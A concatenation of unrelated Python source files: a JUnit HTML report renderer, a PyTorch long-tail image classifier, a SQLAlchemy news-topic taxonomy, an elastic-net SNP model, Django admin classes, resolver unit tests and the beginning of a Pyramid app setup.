elif child.tag == "system-out":
newcase.stdout = child.text
elif child.tag == "system-err":
newcase.stderr = child.text
elif child.tag == "failure":
newcase.failure = child.text
if "message" in child.attrib:
newcase.failure_msg = child.attrib["message"]
elif child.tag == "error":
newcase.failure = child.text
if "message" in child.attrib:
newcase.failure_msg = child.attrib["message"]
def html(self):
"""
Render the test suite as a HTML report with links to errors first.
:return:
"""
cssdata = self.get_css()
return """
<html>
<head>
<title>{name} - Junit Test Report</title>
<style type="text/css">
{css}
</style>
</head>
<body>
<h1>Test Report</h1>
{suite}
</body>
</html>
""".format(name=self.suite.name,
css=cssdata,
suite=self.suite.html())
|
from conda_mirror.convert_environments import _convert_environments
import shutil
import yaml
def test_environment_conversion():
shutil.rmtree("test/repo", ignore_errors=True)
_convert_environments("test/environments", "test/repo", "http://test.com")
with open("test/repo/linux-64/igwn-py37.yaml","rt") as f:
env = yaml.safe_load(f)
assert len(env["channels"]) == 2
assert env["channels"][0] == "http://test.com"
assert env["channels"][1] == "conda-forge"
with open("test/repo/linux-64/igwn-py38.yaml","rt") as f:
env = yaml.safe_load(f)
assert len(env["channels"]) == 2
assert env["channels"][0] == "http://test.com"
assert env["channels"][1] == "conda-forge" |
import torch
import torch.nn as nn
import torch.nn.functional as F
from backbone import (res32_cifar, res50, res10)
from modules import GAP, FCNorm, Identity, LWS
import copy
import numpy as np
import cv2
import os
class Network(nn.Module):
def __init__(self, cfg, mode="train", num_classes=1000):
super(Network, self).__init__()
pretrain = (
True
if mode == "train"
and cfg.RESUME_MODEL == ""
and cfg.BACKBONE.PRETRAINED_MODEL != ""
else False
)
self.num_classes = num_classes
self.cfg = cfg
self.backbone = eval(self.cfg.BACKBONE.TYPE)(
self.cfg,
pretrain=pretrain,
pretrained_model=cfg.BACKBONE.PRETRAINED_MODEL,
last_layer_stride=2,
)
self.mode = mode
self.module = self._get_module()
self.classifier = self._get_classifer()
if cfg.NETWORK.PRETRAINED and os.path.isfile(cfg.NETWORK.PRETRAINED_MODEL):
try:
self.load_model(cfg.NETWORK.PRETRAINED_MODEL)
except:
raise ValueError('network pretrained model error')
def forward(self, x, **kwargs):
if "feature_flag" in kwargs or "feature_cb" in kwargs or "feature_rb" in kwargs:
return self.extract_feature(x, **kwargs)
elif "classifier_flag" in kwargs:
return self.classifier(x)
elif 'feature_maps_flag' in kwargs:
return self.extract_feature_maps(x)
elif 'layer' in kwargs and 'index' in kwargs:
if kwargs['layer'] in ['layer1', 'layer2', 'layer3']:
x = self.backbone.forward(x, index=kwargs['index'], layer=kwargs['layer'], coef=kwargs['coef'])
else:
x = self.backbone(x)
x = self.module(x)
if kwargs['layer'] == 'pool':
x = kwargs['coef']*x+(1-kwargs['coef'])*x[kwargs['index']]
x = x.view(x.shape[0], -1)
x = self.classifier(x)
if kwargs['layer'] == 'fc':
x = kwargs['coef']*x + (1-kwargs['coef'])*x[kwargs['index']]
return x
x = self.backbone(x)
x = self.module(x)
x = x.view(x.shape[0], -1)
x = self.classifier(x)
return x
def get_backbone_layer_info(self):
if "cifar" in self.cfg.BACKBONE.TYPE:
layers = 3
blocks_info = [5, 5, 5]
elif 'res10' in self.cfg.BACKBONE.TYPE:
layers = 4
blocks_info = [1, 1, 1, 1]
else:
layers = 4
blocks_info = [3, 4, 6, 3]
return layers, blocks_info
def extract_feature(self, x, **kwargs):
x = self.backbone(x)
x = self.module(x)
x = x.view(x.shape[0], -1)
return x
def extract_feature_maps(self, x):
x = self.backbone(x)
return x
def freeze_backbone(self):
print("Freezing backbone .......")
for p in self.backbone.parameters():
p.requires_grad = False
def load_backbone_model(self, backbone_path=""):
self.backbone.load_model(backbone_path)
print("Backbone model has been loaded...")
def load_model(self, model_path, tau_norm=False, tau=1):
pretrain_dict = torch.load(
model_path, map_location="cuda"
)
pretrain_dict = pretrain_dict['state_dict'] if 'state_dict' in pretrain_dict else pretrain_dict
model_dict = self.state_dict()
from collections import OrderedDict
new_dict = OrderedDict()
for k, v in pretrain_dict.items():
if k.startswith("module"):
k = k[7:]
if k == 'classifier.weight' and tau_norm:
print('*-*'*30)
print('Using tau-normalization')
print('*-*'*30)
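                # tau-normalization: rescale each class weight vector by its L2 norm raised to the power tau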
v = v / torch.pow(torch.norm(v, 2, 1, keepdim=True), tau)
new_dict[k] = v
if self.mode == 'train' and self.cfg.CLASSIFIER.TYPE == "cRT":
print('*-*'*30)
print('Using cRT')
print('*-*'*30)
for k in new_dict.keys():
if 'classifier' in k: print(k)
new_dict.pop('classifier.weight')
try:
new_dict.pop('classifier.bias')
except:
pass
if self.mode=='train' and self.cfg.CLASSIFIER.TYPE == "LWS":
print('*-*'*30)
print('Using LWS')
print('*-*'*30)
bias_flag = self.cfg.CLASSIFIER.BIAS
for k in new_dict.keys():
if 'classifier' in k: print(k)
class_weight = new_dict.pop('classifier.weight')
new_dict['classifier.fc.weight'] = class_weight
if bias_flag:
class_bias = new_dict.pop('classifier.bias')
new_dict['classifier.fc.bias'] = class_bias
model_dict.update(new_dict)
self.load_state_dict(model_dict)
if self.mode == 'train' and self.cfg.CLASSIFIER.TYPE in ['cRT', 'LWS']:
self.freeze_backbone()
print("All model has been loaded...")
def get_feature_length(self):
if "cifar" in self.cfg.BACKBONE.TYPE:
num_features = 64
elif 'res10' in self.cfg.BACKBONE.TYPE:
num_features = 512
else:
num_features = 2048
return num_features
def _get_module(self):
module_type = self.cfg.MODULE.TYPE
if module_type == "GAP":
module = GAP()
elif module_type == "Identity":
module= Identity()
else:
raise NotImplementedError
return module
def _get_classifer(self):
bias_flag = self.cfg.CLASSIFIER.BIAS
num_features = self.get_feature_length()
if self.cfg.CLASSIFIER.TYPE == "FCNorm":
classifier = FCNorm(num_features, self.num_classes)
elif self.cfg.CLASSIFIER.TYPE in ["FC", "cRT"]:
classifier = nn.Linear(num_features, self.num_classes, bias=bias_flag)
elif self.cfg.CLASSIFIER.TYPE == "LWS":
classifier = LWS(num_features, self.num_classes, bias=bias_flag)
else:
raise NotImplementedError
return classifier
def cam_params_reset(self):
self.classifier_weights = np.squeeze(list(self.classifier.parameters())[0].detach().cpu().numpy())
def get_CAM_with_groundtruth(self, image_idxs, dataset, label_list, size):
ret_cam = []
size_upsample = size
for i in range(len(image_idxs)):
idx = image_idxs[i]
label = label_list[idx]
self.eval()
with torch.no_grad():
img = dataset._get_trans_image(idx)
feature_conv = self.forward(img.to('cuda'), feature_maps_flag=True).detach().cpu().numpy()
b, c, h, w = feature_conv.shape
assert b == 1
feature_conv = feature_conv.reshape(c, h*w)
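                # class activation map: weight the flattened feature maps by the classifier weights of the ground-truth class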
cam = self.classifier_weights[label].dot(feature_conv)
del img
del feature_conv
cam = cam.reshape(h, w)
cam = cam - np.min(cam)
cam_img = cam / np.max(cam)
cam_img = np.uint8(255*cam_img)
ret_cam.append(cv2.resize(cam_img, size_upsample))
return ret_cam
|
# -*- coding: utf-8 -*-
from sqlalchemy import Column, ForeignKey, Integer, String, Float, func, desc
from itertools import groupby
from ..app import db
class Topic(db.Model):
"""
Primary topic for an article.
"""
__tablename__ = "topics"
id = Column(Integer, primary_key=True)
name = Column(String(150), index=True, nullable=False, unique=True)
group = Column(String(100))
# TODO: delete this
analysis_nature_id = Column(Integer, ForeignKey('analysis_natures.id'), index=True, nullable=True)
def __repr__(self):
return "<Topic name='%s'>" % (self.name.encode('utf-8'),)
def __str__(self):
return self.name.encode('utf-8')
def __unicode__(self):
return self.name
def sort_key(self):
try:
# sort ("10. Foo", "10.2 Bar") by the code
parts = (self.group.split(' ', 1)[0], self.name.split(' ', 1)[0])
return [int(k.replace('.', '')) for k in parts]
except:
return (self.group, self.name)
@classmethod
def for_select_widget(cls, topics):
choices = []
topics.sort(key=cls.sort_key)
for group, items in groupby(topics, lambda t: t.group):
choices.append((group or 'General', [[str(t.id), t.name] for t in items]))
return choices
@classmethod
def all(cls):
return sorted(cls.query.order_by(cls.name).all(), key=cls.sort_key)
@classmethod
def create_defaults(self):
text = """
1|Voter education & registration
1|Election fraud
1|Election funding
1|Election logistics
1|Election results
1|Opinion polls
1|Political party campaigning (only when no other code applies)
1|Political party manifesto outlines / analyses
1|Political party coalitions & co-operation
1|Political party politics (internal &/or external)
1|Political violence & intimidation
1|Service delivery
1|Education
1|Environment
1|Health
1|HIV & Aids
1|Corruption (govt, political party, private sector)
1|Crime
1|Justice system
1|Housing
1|Land
1|Gender
1|Children
1|Poverty
1|Race / Racism
1|Refugees / Migration
1|Affirmative action
1|Diplomacy
1|International politics
1|Personalities and profiles
1|Demonstrations / Protests
1|Development
1|Disaster
1|Economics
1|Arts / Culture / Entertainment / Religion
1|Human rights
1|Labour
1|Media
1|Science
1|Sport
1|Disabilities
1|Other (Last Resort)
2|1.1. Adoption - international local and other related issues|1. Adoption
2|2.1. Child Labour - exploitation of children for work as cheap labour|2. Child Abuse
2|2.2. Child Pornography|2. Child Abuse
2|2.3. General when codes below don't apply|2. Child Abuse
2|2.4. Physical Abuse-beatings, burnings|2. Child Abuse
2|2.5. Mental & Emotional Abuse-verbal and consistently making derogatory remarks|2. Child Abuse
2|2.6. Child Prostitution-use of children for sex work|2. Child Abuse
2|2.7. Child Abduction/ Trafficking/ Slavery - abducting a child for sexual purposes or slavery|2. Child Abuse
2|2.8. Kidnapping- taking a child ifor ransom purposes|2. Child Abuse
2|2.9. Child Rape-non-consensual includes penetrative and non-penetrative sex with a minor includes statutory rape|2. Child Abuse
2|2.10. Sexual Abuse- the abuse of boys and girls and included indecent assault and sodomy|2. Child Abuse
2|2.11. Child Neglect-failure to adequately attend to a child's needs|2. Child Abuse
2|2.12. Maintenance and child support-bills, divorce cases|2. Child Abuse
2|3.1. Conflict, Political Violence - Demonstration, Protests, War|3. Conflict, Political Violence
2|4.1. Crime - Murder, robbery, hijacking, theft, Corruption-bribery, fraud at both government and corporate levels|4. Crime
2|5.1. Cultural practices and traditions|5. Cultural practicies and traditions
2|6.1. Development - Policies, projects|6. Development
2|7.1. Disabilities-mental or physical|7. Disabilities
2|8.1. Disaster/Accident - Earthquakes, famine, typhoons, accidents, tragedy|8. Disaster/Accident
2|9.1. Economics - Includes business, corporate news, finance issues, trade agreements|9. Economics
2|10.1. Education General - where the codes below do not apply.|10. Education
2|10.2. Policy related: state of schools, education policies, etc.|10. Education
2|10.3. Events and Achievements: school fun days, awards etc.|10. Education
2|10.4. Violence: levels of violence among learners and school related disasters and tragedies.|10. Education
2|11.1. Environment - Pollution, extinction of animal/plant species|11. Environment
2|12.1. Family-reports on values, the ideal family or focus on a specific family|12. Family
2|13.1. Funds-monies donated for the treatment of HIV|13. Funds
2|14.1. Gender - where the central focus of the story is on a gender related element.|14. Gender
2|15.1. Health - general health issues, diabetes, cancer, nutrition, excludes HIV/AIDS|15. Health
2|16.1. Aids Orphans/children affected by HIV, where children have parents/caregivers due to HIV/AIDS|16. HIV/AIDS
2|16.2. Treatment of HIV/AIDS-items relating to ARVs or nevirapine or treatment in general|16. HIV/AIDS
2|16.3. Sex Education-items on practicing safe sex in relation to HIV/AIDS and in STD's|16. HIV/AIDS
2|16.4. HIV/AIDS - general when other codes don't apply|16. HIV/AIDS
2|17.1. Housing - Includes policies, lack of housing, government initiatives|17. Housing
2|18.1. Human Rights-includes a variety of rights|18. Human Rights
2|19.1. Justice system - Court rulings, constitutional issues, legislation, bills, amendments, judicial system|19. Justice System
2|20.1. Media and arts - New media, freedom of expression, entertainment, culture-theatre, lifestyle issues, fashion, religion and tradition|20. Media and Arts
2|21.1. Personalities/Profiles - Features on prominent personalities or upcoming people|21. Personalities/Profiles
2|22.1. Politics (International) - Diplomacy efforts, political news from outside South Africa|22. Politics
2|22.2. SA National Politics - Includes SA Gov & Parliament-national government, national issues, parliament, national politics|22. Politics
2|22.3. Provincial & Local Govt - Includes municipalities, policies affecting only certain provinces, local government finance|22. Politics
2|23.1. Poverty Rate - Policies|23. Poverty rate
2|24.1. Racism & Xenophobia- incidents of racism & discrimination based on a person's ethnicity or nationality|24. Racism and Xenophobia
2|25.1. Refugee children-asylum seekers, refugees rights|25. Refugee Children
2|26.1. Science-reports about new inventions, technology|26. Science
2|27.1. Social Welfare - Policies on welfare grants, pension, child grants|27. Social Welfare
2|28.1. Sport - news on sport events, reports, athletes, policies|28. Sports
2|29.1. Substance Abuse-drugs and alcohol|29. Substance Abuse
2|30.1. Teenage pregnancy|30. Teenage Pregnancy
2|31.1. Other- to be used as a last resort|31. Other
"""
from .analysis_nature import AnalysisNature
natures = {n.id: n for n in AnalysisNature.all()}
topics = []
for s in text.strip().split("\n"):
parts = s.split("|")
t = Topic()
t.analysis_natures = [natures[int(parts[0])]]
t.name = parts[1].strip()
if len(parts) > 2:
t.group = parts[2].strip()
topics.append(t)
return topics
class DocumentTaxonomy(db.Model):
"""
Taxonomy classification for documents, from AlchemyAPI.
"""
__tablename__ = "document_taxonomies"
id = Column(Integer, primary_key=True)
doc_id = Column(Integer, ForeignKey('documents.id', ondelete='CASCADE'), index=True)
label = Column(String(200), index=True, nullable=False)
score = Column(Float, index=True, nullable=False)
def __repr__(self):
return "<DocumentTaxonomy label='%s', score=%f, doc=%s>" % (
self.label.encode('utf-8'), self.score, self.document)
@classmethod
def summary_for_docs(cls, doc_ids):
""" Summary of document taxonomies.
"""
return db.session.query(
cls.label,
func.count(1).label('freq'))\
.filter(cls.doc_id.in_(doc_ids))\
.group_by(cls.label)\
.order_by(desc('freq'), cls.label)\
.all()
|
import common
import pandas as pd
from os import path, linesep
from sklearn.linear_model import SGDClassifier
def build_model(data_set, data_split, no_interactions, negative, max_snps, cross_validation, output_dir):
"""
Builds a model using logistic regression and an elastic net penalty
:param data_set: The feature data set
:param data_split: The percentage of data to use for testing the model
:param no_interactions: If True interactions will not be included in the model
:param negative: The negative phenotype label
:param max_snps: The maximum number of SNPs for the model to include
:param output_dir: The directory to write the model to
"""
l1_ratio = 0
l1_ratios = []
step_size = 0.05
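    # sweep the elastic-net mixing parameter l1_ratio from 0 (pure L2) towards 1 (mostly L1) in 0.05 steps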
while l1_ratio < 1:
l1_ratios.append(l1_ratio)
l1_ratio += step_size
param_grid = {'l1_ratio': l1_ratios}
model_eval = {
'roc': get_roc_probs,
'features': save_features
}
common.build_model(
data_set,
data_split,
no_interactions,
negative,
SGDClassifier(
loss="log", penalty="elasticnet", random_state=1, n_jobs=-1, max_iter=1000, tol=1e-3),
cross_validation,
max_snps,
output_dir,
param_grid,
model_eval
)
def get_roc_probs(model, x_test):
"""
Gets the prediction probabilities to generate an ROC curve
:param model: The trained model
:param x_test: The test data
:return: The prediction probabilities for the test data
"""
return model.decision_function(x_test)
def save_features(model, term_labels, output_dir):
"""
Saves the features ordered by influence. The reason the coefficients can be used to determine feature importance
is because all feature data is scaled to be the same range before training the model.
:param model: The trained model
:param term_labels: The model term labels
:param output_dir: The directory to write the features to
"""
features = pd.DataFrame({'feature': term_labels, 'coefficient': model.coef_.ravel()})
features['coef_abs'] = features['coefficient'].abs()
features = features[features['coef_abs'] > 0]
features.sort_values(ascending=False, inplace=True, by='coef_abs')
features.drop('coef_abs', axis=1, inplace=True)
    with open(path.join(output_dir, 'model_features.csv'), 'w') as f:
f.write('intercept: {}{}{}'.format(model.intercept_[0], linesep, linesep))
        # main effects (term labels without a ':')
        f.write('{}main effects:{}'.format(linesep, linesep))
        interaction_mask = features['feature'].str.contains(':')
        features[~interaction_mask].to_csv(f, index=False)
        # interaction effects (term labels containing ':')
        f.write('{}interaction effects:{}'.format(linesep, linesep))
        features[interaction_mask].to_csv(f, index=False)
|
from django.contrib import admin
from django.db.models import JSONField
from django_krules_procevents.widgets import ReadOnlyJSONWidget
from .models import Fleet, ReceivedData, LocationTrackerService, LocationTrackerData
@admin.register(Fleet)
class FleetAdmin(admin.ModelAdmin):
readonly_fields = ["endpoint", "dashboard"]
@admin.register(ReceivedData)
class ReceivedDataAdmin(admin.ModelAdmin):
list_display = ['owner', 'device', 'timestamp']
search_fields = ['device']
list_filter = ['owner']
readonly_fields = ['device', 'owner', 'timestamp']
formfield_overrides = {
JSONField: {'widget': ReadOnlyJSONWidget()},
}
def has_add_permission(self, request):
return False
@admin.register(LocationTrackerService)
class LocationTrackerServiceAdmin(admin.ModelAdmin):
list_display = ["name", "maintenance"]
list_editable = ["maintenance"]
def has_add_permission(self, request):
return False
@admin.register(LocationTrackerData)
class LocationTrackerDataAdmin(admin.ModelAdmin):
list_display = ["owner", "device", "location", "coords", "timestamp"]
readonly_fields = ["owner", "device", "location", "coords", "timestamp"]
search_fields = ["owner", "device"]
list_filter = ["owner", "device"]
def has_add_permission(self, request):
return False
|
def swap(vet, i, menor):
aux = vet[i]
vet[i] = vet[menor]
vet[menor] = aux
def selectionSort(vet):
for i in range(len(vet)):
menor = i
for j in range(i+1, len(vet)):
if vet[j] < vet[menor]:
menor = j
if i != menor:
swap(vet, i, menor)
return vet
def main():
vet = [6, 3, 4, 5, 2, 7, 1, 9, 8, 0]
print(selectionSort(vet))
if __name__ == '__main__':
main() |
import sys
if sys.version_info >= (3, 8):
from unittest import IsolatedAsyncioTestCase as TestCase
from unittest.mock import AsyncMock
else:
from unittest import TestCase
from asynctest.mock import CoroutineMock as AsyncMock
from unittest.mock import Mock, call, sentinel
import pytest
from jj.apps import create_app
from jj.resolvers import Registry, Resolver
class TestResolver(TestCase):
def setUp(self):
self.default_handler = AsyncMock(return_value=sentinel.default_response)
self.default_app = create_app()
self.resolver = Resolver(Registry(), self.default_app, self.default_handler)
# Apps
def test_get_apps(self):
apps = self.resolver.get_apps()
self.assertEqual(apps, [])
def test_register_app(self):
res = self.resolver.register_app(type(self.default_app))
self.assertIsNone(res)
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(self.default_app)])
def test_register_another_app(self):
self.resolver.register_app(type(self.default_app))
app = create_app()
self.resolver.register_app(type(app))
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(self.default_app), type(app)])
def test_register_app_twice(self):
self.resolver.register_app(type(self.default_app))
res = self.resolver.register_app(type(self.default_app))
self.assertIsNone(res)
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(self.default_app)])
def test_deregister_single_app(self):
self.resolver.register_app(type(self.default_app))
res = self.resolver.deregister_app(type(self.default_app))
self.assertIsNone(res)
apps = self.resolver.get_apps()
self.assertEqual(apps, [])
def test_deregister_app(self):
app1, app2 = create_app(), create_app()
self.resolver.register_app(type(app1))
self.resolver.register_app(type(app2))
self.resolver.deregister_app(type(app1))
apps = self.resolver.get_apps()
self.assertEqual(apps, [type(app2)])
def test_deregister_nonexisting_app(self):
app = create_app()
res = self.resolver.deregister_app(type(app))
self.assertIsNone(res)
# Handlers
def test_get_handlers(self):
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [])
def test_get_handlers_with_nonexisting_app(self):
app = create_app()
handlers = self.resolver.get_handlers(type(app))
self.assertEqual(handlers, [])
def test_register_handler(self):
handler = AsyncMock(return_value=sentinel.response)
res = self.resolver.register_handler(handler, type(self.default_app))
self.assertIsNone(res)
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler])
def test_register_another_handler(self):
handler1 = AsyncMock(return_value=sentinel.response)
handler2 = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler1, type(self.default_app))
self.resolver.register_handler(handler2, type(self.default_app))
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler1, handler2])
def test_register_handler_twice(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.register_handler(handler, type(self.default_app))
self.assertIsNone(res)
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler])
def test_deregister_single_handler(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.deregister_handler(handler, type(self.default_app))
self.assertIsNone(res)
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [])
def test_deregister_handler(self):
handler1 = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler1, type(self.default_app))
handler2 = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler2, type(self.default_app))
self.resolver.deregister_handler(handler1, type(self.default_app))
handlers = self.resolver.get_handlers(type(self.default_app))
self.assertEqual(handlers, [handler2])
def test_deregister_nonexisting_handler(self):
handler = AsyncMock(return_value=sentinel.response)
res = self.resolver.deregister_handler(handler, type(self.default_app))
self.assertIsNone(res)
def test_deregister_handler_with_nonexisting_app(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
app = create_app()
res = self.resolver.deregister_handler(handler, type(app))
self.assertIsNone(res)
# Attributes
def test_get_nonexisting_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
attribute_value = self.resolver.get_attribute(sentinel.name, handler)
self.assertEqual(attribute_value, sentinel)
def test_get_attribute_with_non_existing_handler(self):
handler = AsyncMock(return_value=sentinel.response)
default = None
attribute_value = self.resolver.get_attribute(sentinel.name, handler, default)
self.assertEqual(attribute_value, default)
def test_register_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.register_attribute(sentinel.name, sentinel.value, handler)
self.assertIsNone(res)
attribute_value = self.resolver.get_attribute(sentinel.name, handler)
self.assertEqual(attribute_value, sentinel.value)
def test_register_another_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
self.resolver.register_attribute(sentinel.name1, sentinel.value1, handler)
self.resolver.register_attribute(sentinel.name2, sentinel.value2, handler)
attribute_value2 = self.resolver.get_attribute(sentinel.name2, handler)
self.assertEqual(attribute_value2, sentinel.value2)
attribute_value1 = self.resolver.get_attribute(sentinel.name1, handler)
self.assertEqual(attribute_value1, sentinel.value1)
def test_register_attribute_twice(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
self.resolver.register_attribute(sentinel.name1, sentinel.value1, handler)
res = self.resolver.register_attribute(sentinel.name, sentinel.value, handler)
self.assertIsNone(res)
attribute_value = self.resolver.get_attribute(sentinel.name, handler)
self.assertEqual(attribute_value, sentinel.value)
def test_deregister_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
self.resolver.register_attribute(sentinel.name, sentinel.value, handler)
res = self.resolver.deregister_attribute(sentinel.name, handler)
self.assertIsNone(res)
attribute_value = self.resolver.get_attribute(sentinel.name, handler, default=None)
self.assertEqual(attribute_value, None)
def test_deregister_nonexisting_attribute(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
res = self.resolver.deregister_attribute(sentinel.name, handler)
self.assertIsNone(res)
def test_deregister_attribute_with_nonexisting_handler(self):
handler = AsyncMock(return_value=sentinel.response)
res = self.resolver.deregister_attribute(sentinel.name, handler)
self.assertIsNone(res)
# Matchers
def test_get_matchers_without_matchers(self):
matchers = self.resolver.get_matchers(self.default_handler)
self.assertEqual(matchers, [])
def test_get_matchers_with_one_matcher(self):
matcher = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher, self.default_handler)
matchers = self.resolver.get_matchers(self.default_handler)
self.assertEqual(matchers, [matcher])
def test_get_matchers_with_multiple_matchers(self):
matcher1 = AsyncMock(return_value=True)
matcher2 = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher1, self.default_handler)
self.resolver.register_matcher(matcher2, self.default_handler)
matchers = self.resolver.get_matchers(self.default_handler)
self.assertEqual(matchers, [matcher1, matcher2])
def test_register_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
self.assertIsNone(self.resolver.register_matcher(matcher, handler))
def test_deregister_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher, handler)
res = self.resolver.deregister_matcher(matcher, handler)
self.assertIsNone(res)
matchers = self.resolver.get_matchers(handler)
self.assertEqual(matchers, [])
def test_deregister_matcher_with_nonexisting_handler(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
res = self.resolver.deregister_matcher(matcher, handler)
self.assertIsNone(res)
# Resolver
@pytest.mark.asyncio
async def test_resolve_request_with_all_truthy_matchers(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=True)
matcher2 = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler)
matcher1.assert_called_once_with(request)
matcher2.assert_called_once_with(request)
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_all_falsy_matchers(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=False)
matcher2 = AsyncMock(return_value=False)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
matcher1.assert_called_once_with(request)
matcher2.assert_not_called()
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_first_falsy_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=False)
matcher2 = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
matcher1.assert_called_once_with(request)
matcher2.assert_not_called()
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_last_falsy_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher1 = AsyncMock(return_value=True)
matcher2 = AsyncMock(return_value=False)
self.resolver.register_matcher(matcher1, handler)
self.resolver.register_matcher(matcher2, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
matcher1.assert_called_once_with(request)
matcher2.assert_called_once_with(request)
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_without_handlers(self):
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
@pytest.mark.asyncio
async def test_resolve_request_with_nonexisting_app(self):
app = create_app()
request = Mock()
response = await self.resolver.resolve(request, app)
self.assertEqual(response, self.default_handler)
@pytest.mark.asyncio
async def test_resolve_request_without_matchers(self):
handler = AsyncMock(return_value=sentinel.response)
self.resolver.register_handler(handler, type(self.default_app))
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, self.default_handler)
@pytest.mark.asyncio
async def test_resolve_request_with_single_matcher(self):
handler = AsyncMock(return_value=sentinel.response)
matcher = AsyncMock(return_value=True)
self.resolver.register_matcher(matcher, handler)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler)
matcher.assert_called_once_with(request)
handler.assert_not_called()
@pytest.mark.asyncio
async def test_resolve_request_with_multiple_handlers(self):
matcher = AsyncMock(side_effect=(False, True))
handler1 = AsyncMock(return_value=sentinel.response1)
handler2 = AsyncMock(return_value=sentinel.response2)
self.resolver.register_matcher(matcher, handler1)
self.resolver.register_matcher(matcher, handler2)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler1)
handler1.assert_not_called()
handler2.assert_not_called()
matcher.assert_has_calls([call(request)] * 2, any_order=True)
self.assertEqual(matcher.call_count, 2)
@pytest.mark.asyncio
async def test_resolve_request_priority(self):
matcher = AsyncMock(side_effect=(True, True))
handler1 = AsyncMock(return_value=sentinel.response1)
handler2 = AsyncMock(return_value=sentinel.response2)
self.resolver.register_matcher(matcher, handler1)
self.resolver.register_matcher(matcher, handler2)
request = Mock()
response = await self.resolver.resolve(request, self.default_app)
self.assertEqual(response, handler2)
handler1.assert_not_called()
handler2.assert_not_called()
matcher.assert_called_once_with(request)
|
import gameBoard
def main():
    print('Welcome to TicTacToe')
    playAgain = 'yes'
    while playAgain == 'yes':
        # a round of the game (runGame from gameBoard) would be played here
        playAgain = input('Do you want to play again? (Type yes or no) ').lower()
    print("i love johnson")
|
import datetime
import logging.config
import transaction
from pyramid.config import Configurator
from pyramid.authentication import AuthTktAuthenticationPolicy
from pyramid.authorization import ACLAuthorizationPolicy
from pyramid.session import SignedCookieSessionFactory
from sqlalchemy import engine_from_config
from whoahqa.constants import permissions as perms
from whoahqa.constants import groups
from utils import (
hashid,
enketo,
format_date_for_locale,
format_location_name,
round_or_none)
from whoahqa.security import group_finder, pwd_context
from whoahqa.models import (
DBSession,
Base,
Clinic,
Group,
LocationFactory,
Municipality,
OnaUser,
State,
User,
UserProfile,
UserFactory,
ClinicFactory,
SubmissionFactory,
ReportingPeriod,
ReportingPeriodFactory,
)
from whoahqa.views import (
get_request_user,
can_access_clinics,
can_list_clinics,
can_view_clinics,
can_view_municipality,
can_create_period,
can_view_state,
can_list_state,
is_super_user
)
DEVELOPMENT_ENV = "development"
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
Base.metadata.bind = engine
session_factory = SignedCookieSessionFactory(
settings['secret_key'])
config = Configurator(settings=settings,
root_factory='whoahqa.models.RootFactory',
session_factory=session_factory)
config.set_authentication_policy(
AuthTktAuthenticationPolicy(settings['secret_key'],
callback=group_finder,
hashalg='sha512'))
config.set_authorization_policy(ACLAuthorizationPolicy())
config.set_default_permission(perms.AUTHENTICATED)
# Add custom renderers
config.add_renderer('csv', 'whoahqa.renderers.CSVRenderer')
# Add request object helpers
add_request_helpers(config)
# setup the hashid salt
